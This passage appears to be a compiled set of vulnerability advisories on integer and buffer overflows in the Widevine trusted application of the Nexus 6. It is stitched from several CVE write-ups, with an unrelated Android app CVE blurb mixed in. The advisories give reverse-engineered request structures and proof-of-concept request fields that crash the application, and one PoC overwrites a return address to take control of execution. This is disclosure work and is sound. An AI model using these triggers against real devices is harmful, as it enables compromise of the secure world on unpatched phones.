The persist_prefix string is initialized with the value "/persist/data/" by default, and the filePathBuffer is initially empty, so that the total length of the final string afer calling PRDiagPruneTrailingSlashes() is 13. After that, the contents of the user-controlled msg_buf are appended to fullFilePathBuffer after checking if the length does not exeed 128 bytes.

The bug is present in this check. Since the addition is done using a signed integer, this calculation causes an integer overflow if the sum of msg_buf_size and the string length of fullFilePathBuffer is large enough, resulting in a negative value and bypassing the if statement. Consequently, the subsequent memory copy can cause a buffer overflow:

The range of values for msg_buf_size that can cause a buffer overflow extends from -13 (0xfffffff3) to -1 (0xffffffff).

The user has full control over the **value** of msg_buf_size and the **contents** of the msg_buf buffer in the Request Buffer.

Since there are 13 specific and large msg_buf_size values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50004;  // PRDiagProvisionDataHandler
req\->payload.op \= 0;    // PRDiagParseAndStoreData
...
req\->payload.msg\_buf\_size \= 0xffffffff;
req\->payload.data\_len \= 1;

The Commmand ID 0x50004 is specified to invoke PRDiagProvisionDataHandler(), and the PRDiagParseAndStoreData operation is being specified. In addition, msg_buf_size is set to 0xffffffff so that the sum of msg_buf_size + iVar5 overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "PRDiagProvisionDataHandler: pTzMsg 0xfff00008, reqlen 10240"
<5>widevine: "PRDiagParseAndStoreData: begins!"
<5>widevine: "PRDiagPruneTrailingSlashes:  pPath 0x2e5fc"
<5>widevine: "PRDiagPruneTrailingSlashes: ends!"
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

CVE-2022-48336: Cyber Intelligence - Hardware and Software Security Assessments

Widevine Trusted Application (TA) 5.0.0 through 7.1.1 has a PRDiagVerifyProvisioning integer overflow and resultant buffer overflow.

CVE-2022-48335:

Buffer Overflow in Widevine Trustlet (PRDiagVerifyProvisioning @ 0x5f90)

 

CVE:

CVE-2022-48335

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

Warning

To the best of our knowledge, the vulnerability described in this post has been incorrectly associated with CVE-2015-6639. After consulting with MITRE, it has been confirmed that this vulnerability had no assigned identifier. Consequently, CVE-2022-48335 has been assigned to this vulnerability.

On the other hand, it has been confirmed that CVE-2015-6639 does exist and corresponds with a different vulnerability reported by Google. We have notified all the concerned parties about this misunderstanding so that the confusion can be amended.

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N), 6.0.0 (MRA58K), 6.0.0 (MRA58N), 6.0.0 (MRA58R), 6.0.0 (MRA58X), 7.0.0 (NBD90Z), 7.0.0 (NBD91P), 7.0.0 (NBD91U), 7.0.0 (NBD91X), 7.0.0 (NBD91Y), 7.0.0 (NBD91Z), 7.0.0 (NBD92F), 7.0.0 (NBD92G), 7.1.1 (N6F26Q), 7.1.1 (N6F26R), 7.1.1 (N6F26U), 7.1.1 (N6F27C), 7.1.1 (N6F27E).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s PRDiagVerifyProvisioning() command. This command closely resembles PRDiagClearProvisioning(), which has been featured in other blog entries (refer to CVE-2015-6647).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50003: // PRDiagMaintenanceHandler
    if ((0x2807 < req\_buf\_size) && (7 < resp\_buf\_size)) {
        ret \= PRDiagMaintenanceHandler(req\_buf + 2, req\_buf\[1\]);
        ...
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50003, it jumps to the PRDiagMaintenanceHandler() function. This function handles two sub-commands: PRDiagVerifyProvisioning and PRDiagClearProvisioning.

The structure of the Request Buffer for the PRDiagMaintenanceHandler() function is the following:

struct widevine\_PRDiagMaintenanceHandler\_cmd {
        uint32\_t cmd\_id;
        uint32\_t payload\_size;
        struct widevine\_PRDiagMaintenanceHandler\_payload payload;
};

It contains an embedded structure and an integer indicating its size. The embedded structure is defined in the following code-block:

// Internal payload/request buffer for PRDiagMaintenanceHandler command
struct widevine\_PRDiagMaintenanceHandler\_payload {
        enum {
                op\_PRDiagVerifyProvisioning    \= 0,
                op\_PRDiagClearProvisioning     \= 1,
                PRDiagMH\_FORCE\_ENUM\_32\_BITS \= (INT\_MAX | ~INT\_MAX),
        } op;
        uint32\_t compare\_flag;
        uint32\_t msg\_buf\_size;
        uint32\_t data\_len;
        // The buffer containing the input data for the PRDiagVerifyProvisioning function.
        // This data could be related to provisioning information, cryptographic keys,
        // or other DRM-related metadata.
        // NOTE: The widevine trustlet checks the size of the request buffer
        // containing the widevine\_PRDiagMaintenanceHandler\_cmd structure.
        // The entire request buffer must have at least 0x2808 bytes
        char msg\_buf\[\];
};

The relevant parts are the op value indicating the sub-command to be executed (either PRDiagVerifyProvisioning or PRDiagClearProvisioning), an input buffer called msg_buf and its size, stored in msg_buf_size.

The PRDiagMaintenanceHandler function simply copies the payload/request into a temporary heap buffer and passes it to the corresponding sub-command:

int PRDiagMaintenanceHandler(void \*payload, uint32\_t payload\_size) {
     struct widevine\_PRDiagMaintenanceHandler\_payload \*req;

     if (!payload || !payload\_size) return 0x10;

     req \= malloc(payload\_size);
     if (!req) return 0xf;

     memcpy(req, payload, payload\_size);
     if (req\->op \== 0) {
         PRDiagVerifyProvisioning(req);
     }
     else if (req\->op \== 1) {
         PRDiagClearProvisioning(req);
     }
     ...

For this bug, let’s focus on the PRDiagVerifyProvisioning sub-command. The main functionality of this function is to check the integrity and authenticity of the provisioning data by comparing it to the corresponding data stored in the Secure File System (SFS).

The following code snippet shows a simplified version of the PRDiagVerifyProvisioning function:

int PRDiagVerifyProvisioning(struct widevine\_PRDiagMaintenanceHandler\_payload \*req) {
    // Check input and operation
    if (!req || req\->op != 0) return 0x10;

    msg\_buf\_size \= req\->msg\_buf\_size;
    msg\_buf \= &req\->msg\_buf;
    ...
    if (!req\->data\_len) {
        strlen(&persist\_prefix); // result ignored
        memzero(&filePathBuffer, 0x80); // 0x2e0fc
        memcpy(&filePathBuffer, msg\_buf, msg\_buf\_size);    }
    else {
        ...

The function first performs some validations on the input and the operation being requested and then checks the data_len value. If this value is zero, it copies the user-controlled msg_buf into a buffer in the data segment (0x2e0fc). The contents and size of this buffer are directly specified by the client through the Request Buffer.

The hardcoded value of the memzero suggests that the size of this buffer is 128 bytes. However, since msg_buf_size is not being checked, this copy operation can cause a buffer overflow:

This vulnerability allows an attacker to overwrite important data structures such as the stack and heap, since they are in higher addresses within this same data segment.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50003;  // PRDiagMaintenanceHandler
req\->payload.op \= 0;    // PRDiagVerifyProvisioning
req\->payload.msg\_buf\_size \= 0x1644;
// 0x1644 overwrites ret-code in the stack
...
memset(req\->payload.msg\_buf, 'A', req\->payload.msg\_buf\_size);

The Commmand ID 0x50003 is specified to invoke PRDiagMaintenanceHandler(), and the PRDiagVerifyProvisioning operation is being specified. In addition, msg_buf_size is set to 0x1644 so that it overflows the data buffer and ends up overwriting the return code in the stack:

<5>widevine: "PRDiagMaintenanceHandler: pTzMsg 0xfff00008, reqlen 10240"
<5>widevine: "PRDiagVerifyProvisioning: begins!"
<5>widevine: "PRDiagVerifyProvisioning: returned 1094795585"
<5>widevine: "PRDiagMaintenanceHandler: returned 1094795585"

It can be observed that the returning value is 1094795585, which is the decimal representation of the value 0x41414141 that comes from our msg_buf buffer. We can also verify that this value is stored in the response buffer returned by the trusted application:

\[\*\] Widevine PRDiagMaintenanceHandler => Return code: 0x41414141

Adding four more bytes to the buffer being copied allows us to overwrite the return address in the stack and thus give us control over the execution flow:

req\->cmd\_id \= 0x50003;  // PRDiagMaintenanceHandler
req\->payload.op \= 0;    // PRDiagVerifyProvisioning
req\->payload.msg\_buf\_size \= 0x1648;
// 0x1648 overwrites return address in the stack
...
memset(req\->payload.msg\_buf, 'A', req\->payload.msg\_buf\_size);

Note that the difference is that we added four bytes to msg_buf_size:

<5>widevine: "PRDiagMaintenanceHandler: pTzMsg 0xfff00008, reqlen 10240"
<5>widevine: "PRDiagVerifyProvisioning: begins!"
\*\*\* crash @ 0x41414140 \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED. In this case, Widevine crashes because it ends up jumping to the address 0x41414140 coming from our msg_buf buffer.

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

CVE-2022-48335: Cyber Intelligence - Hardware and Software Security Assessments

Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_verify_keys total_len+file_name_len integer overflow and resultant buffer overflow.

CVE-2022-48334:

Buffer Overflow in Widevine Trustlet (drm\_verify\_keys @ 0x7370)

 

CVE:

CVE-2022-48334

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M) and 5.1.1 (LYZ28N).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s drm_verify_keys() command. This command closely resembles drm_save_keys(), which has been featured in other blog entries (refer to CVE-2022-48331 and CVE-2022-48332).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50002: // drm\_verify\_keys() command
    if ((0x2a0f < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        drm\_verify\_keys(
            req\_buf + 4,    req\_buf\[1\], // feature\_name
            req\_buf + 0x44, req\_buf\[2\]  // file\_name
        );
        ...
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50002, it jumps to the drm_verify_keys() function.

The structure of the Request Buffer for this command is the following:

struct widevine\_drm\_save\_keys\_cmd {
    uint32\_t cmd\_id;
    uint32\_t feature\_name\_len;
    uint32\_t file\_name\_len;
    char feature\_name\[0x100\];
    char file\_name\[0x100\];
};

It contains two buffers (_i.e._, feature_name and file_name) and two integers indicating the effective length of each buffer. It is important to note that even though the maximum size of each buffer is 256 bytes, the client has control over the values of feature_name_len and file_name_len, since they are directly taken from the Request Buffer.

The main functionality of drm_verify_keys() is to verify the integrity of encryption keys or DRM-related data stored within the Widevine DRM system. It performs the following high-level tasks:

> *   Validate input parameters and check for any constraints that may prevent the verification process.
>     
> *   Construct a full file path using the provided feature name and file name.
>     
> *   Set the CRC (cyclic redundancy check) file path, which is used for verifying the integrity of the keys.
>     
> *   Verify the stored encryption keys or DRM-related data and check for any tampering or corruption.
>     

The bug is present in the validation of input parameters while constructing the SFS file path:

heap\_buf \= malloc(0x100);
...
memzero(heap\_buf, 0x80);
prefix\_len \= strncpy(heap\_buf, &persist\_prefix, 0x80);
total\_len \= prefix\_len + feature\_name\_len;
// ---- CVE-2022-48333 ---- //
if (total\_len < 0x100) {
    prefix\_len \= strlen(&persist\_prefix);
    memcpy(heap\_buf + prefix\_len, feature\_name, feature\_name\_len);
    // ----------------------- //
    \*(heap\_buf + total\_len) \= '/';
    if (total\_len + feature\_name\_len < 0xff) {
        memcpy(heap\_buf + total\_len + 1, feature\_name, feature\_name\_len);
        total\_len += (feature\_name\_len + 1);        \*(heap\_buf + total\_len) \= '/';
        // ---- CVE-2022-48334 ---- //
        if (total\_len + file\_name\_len < 0xff) {            memcpy(heap\_buf + total\_len + 1, file\_name, file\_name\_len);            ...
}

In this code snippet, a heap buffer is allocated and the persist_prefix string is copied into it using the strncpy() function. This string is initialized with the value "/persist/data/" by default, so that it’s length is 14. The buffer is then filled with the provided feature name, ensuring the total length does not exceed the specified limit. This is done using total_len by adding the length of the persist_prefix string and feature_name_len, which is directly specified by the client through the Request Buffer.

The first part corresponds to CVE-2022-48333, where the check if (total_len < 0x100) is performed using a signed integer and can cause a buffer overflow if feature_name_len takes any value from -14 (0xfffffff2) to -1 (0xffffffff).

To pass this first check without triggering the first bug, the value of feature_name_len must be within the inclusive range of 1 to 241. Then, the code appends the feature_name string two times to the temporary heap buffer. In the previous code snippet, there is a second check on feature_name_len that constraints its value to \[1, 120\]. Finally, there is a third if that checks the value of file_name_len. At this point, the result of the addition is treated as a signed integer, which leads to an incorrect check. Consequently, this third check is bypassed when the values for file_name_len are sufficiently large:

req.feature\_name\_len \= 120; // valid values are: \[1, 120\]
req.file\_name\_len \= \-(14 + (2 \* req.feature\_name\_len) + 1);

The code after the check calls the memcpy() function to copy the contents of the file_name string into the heap buffer, using the improperly checked file_name_len. Since this value can be large enough, it can cause a buffer overflow in this copy operation:

The user has full control over the **value** of file_name_len and the **contents** of the file_name buffer in the Request Buffer.

Since there are several specific and large file_name_len values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50002;  // drm\_verify\_keys
req.feature\_name\_len \= 1;
req.file\_name\_len \= 0xffffffff;
...

The Commmand ID 0x50002 is specified to invoke drm_verify_keys(), and file_name_len is set to 0xffffffff so that the sum of total_len + file_name_len overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "drm\_verify\_keys: feature\_name 0xfff00010, feature\_name\_len 1, file\_name 0xfff00110,  file\_name\_len 4294967295"
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

CVE-2022-48334: Cyber Intelligence - Hardware and Software Security Assessments

The laola.redbull application through 5.1.9-R for Android exposes the exported activity at.redbullsalzburg.android.AppMode.Default.Splash.SplashActivity, which accepts a data: URI. The target of this URI is subsequently loaded into the application's webview, thus allowing the loading of arbitrary content into the context of the application. This can occur via the fcrbs schema or an explicit intent invocation.

CVE-2023-29459

Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_save_keys integer overflow and resultant buffer overflow.

CVE-2022-48331:

Buffer Overflow in Widevine Trustlet (drm\_save\_keys @ 0x69b0)

 

CVE:

CVE-2022-48331

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M) and 5.1.1 (LYZ28N).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s drm_save_keys() command. This command closely resembles drm_verify_keys(), which has been featured in other blog entries (refer to CVE-2022-48333 and CVE-2022-48334).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50001: // drm\_save\_keys() command
    if ((0x2a10 < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        ...
        drm\_save\_keys(
            req\_buf + 4,    req\_buf\[1\], // feature\_name
            req\_buf + 0x44, req\_buf\[2\], // file\_name
            req\_buf + 0x84, req\_buf\[3\], // msg
            resp\_buf + 4                // prt\_path (result)
        );
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50001, it jumps to the drm_save_keys() function.

The structure of the Request Buffer for this command is the following:

struct widevine\_drm\_save\_keys\_cmd {
    uint32\_t cmd\_id;
    uint32\_t feature\_name\_len;
    uint32\_t file\_name\_len;
    uint32\_t msg\_len;
    char feature\_name\[0x100\];
    char file\_name\[0x100\];
    char msg\_data\[0x100\];
};

It contains three buffers (_i.e._, feature_name, file_name and msg_data) and three integers indicating the effective length of each buffer. It is important to note that even though the maximum size of each buffer is 256 bytes, the client has control over the values of feature_name_len, file_name_len and msg_len, since they are directly taken from the Request Buffer.

The main functionality of drm_save_keys() is securely storing encryption keys or DRM-related data. It performs the following high-level tasks:

> *   Validate input parameters and check for any constraints that may prevent key storage.
>     
> *   Construct a file path using the provided feature name and file name.
>     
> *   Write the message data, which may contain encryption keys or DRM-related information, to a Secure File System (SFS).
>     
> *   Compute and store a CRC value for the written data to ensure data integrity and error detection.
>     

The bug is present in the validation of input parameters while constructing the SFS file path:

heap\_buf \= malloc(0x100);
...
memzero(heap\_buf, 0x80);
prefix\_len \= strncpy(heap\_buf, &persist\_prefix, 0x80);
total\_len \= prefix\_len + feature\_name\_len; // Signed int
if (total\_len < 0x100) {
    prefix\_len \= strlen(&persist\_prefix);
    memcpy(heap\_buf + prefix\_len, feature\_name, feature\_name\_len);    ...
}

In this code snippet, a heap buffer is allocated and the persist_prefix string is copied into it using the strncpy() function. This string is initialized with the value "/persist/data/" by default, so that it’s length is 14. The buffer is then filled with the provided feature name, ensuring the total length does not exceed the specified limit. This is done using total_len by adding the length of the persist_prefix string and feature_name_len, which is directly specified by the client through the Request Buffer.

The bug is present in this calculation. Since total_len is a signed integer, this calculation causes an integer overflow if the sum of prefix_len and feature_name_len is large enough, resulting in a negative value for total_len. As a result, the subsequent if statement passes even if the actual total length of the string is greater than the allocated buffer size.

Since the check is if (total_len < 0x100), for the condition 14 + feature_name_len < 0x100 to be triggered, the value of feature_name_len must be within the inclusive range of -14 to 241.

The code after the check calculates again the prefix_len and calls the memcpy() function to copy the contents of the feature_name string into the buffer, immediately following the persist_prefix, using feature_name_len. Since this value can be large enough, it can cause a buffer overflow in this copy operation:

The range of values for feature_name_len that can cause a buffer overflow extends from -14 (0xfffffff2) to -1 (0xffffffff).

The user has full control over the **value** of feature_name_len and the **contents** of the feature_name buffer in the Request Buffer.

Since there are 14 specific and large feature_name_len values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50001;  // drm\_save\_keys;
req\->feature\_name\_len \= 0xffffffff;
req\->file\_name\_len \= 1;
req\->msg\_len \= 1;
...

The Commmand ID 0x50001 is specified to invoke drm_save_keys(), and feature_name_len is set to 0xffffffff so that the sum of prefix_len + feature_name_len overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "drm\_save\_keys: feature\_name 0xfff00010, feature\_name\_len 4294967295, file\_name 0xfff00110, file\_name\_len 1, msg\_data 0xfff00210
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

Tag

#android